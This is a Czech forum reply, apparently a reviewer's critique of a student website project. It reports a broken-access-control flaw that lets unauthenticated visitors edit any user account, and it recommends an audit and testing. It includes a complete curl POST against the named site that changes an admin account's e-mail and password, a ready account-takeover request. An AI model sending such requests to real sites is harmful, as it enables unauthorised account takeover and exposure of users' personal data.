Odpověď na téma: 42 – kraj ZL – obory 01, 18

[Ondřej Budín]

Po pár minutách strávených procházením webu, jsem narazil na další, a to opravdu velký, bezpečnostní problém. Zjistil jsem, že interní sekce je dostupná i bez přihlášení uživatele. Což se v prohlížeči projeví vykreslením interní nástěnky a prázdných editačních formulářů.

Formuláře jsou sice prázdné, nicméně pokud si je vyplním ručně a zadám ID uživatele, mohu jako nepřihlášený uživatel upravovat libovolný uživatelský účet a například pomocí příkazu níže může útočník změnit opravdu triviálně e-mail, pomocí kterého si následně změní také heslo a získá tak přístup do jakéhokoli účtu.

curl ‚http://webzas.wz.cz/web_zas/pages/interni-sekce/upravit-vlastni-ucet.php‘ -H ‚Content-Type: application/x-www-form-urlencoded‘ –data ‚jmeno=admintest2&prijmeni=admin&datumnarozeni=2002-04-03&profilovy-obrazek=&ujmeno=admin&email=admin4%40admin.com&telefon=678541988&heslo=%40%23%26%24%24&status=Admin&datum-vzniku=20.+4.+2020+ve+12%3A31&pocet-prispevku=Ano&id=2&upravit=Upravit‘

Toto je opravdu vážný problém, díky kterému v budoucnu může kdykoliv dojít k úniku osobních údajů všech registrovaných návštěvníků a porušení GDPR. A navíc nelze vyloučit, že se v kódu nevyskytuje více takových chyb. To by spolehlivě pomohl odhalit audit kódu a strojové otestování webu.